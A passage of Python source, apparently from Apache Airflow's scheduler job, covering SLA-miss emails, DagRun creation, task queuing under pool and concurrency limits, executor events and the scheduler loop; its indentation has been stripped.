dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
num_tasks_in_executor = 0
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, zombies, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessor(file_path,
pickle_dags,
dag_ids,
zombies)
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = models.DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
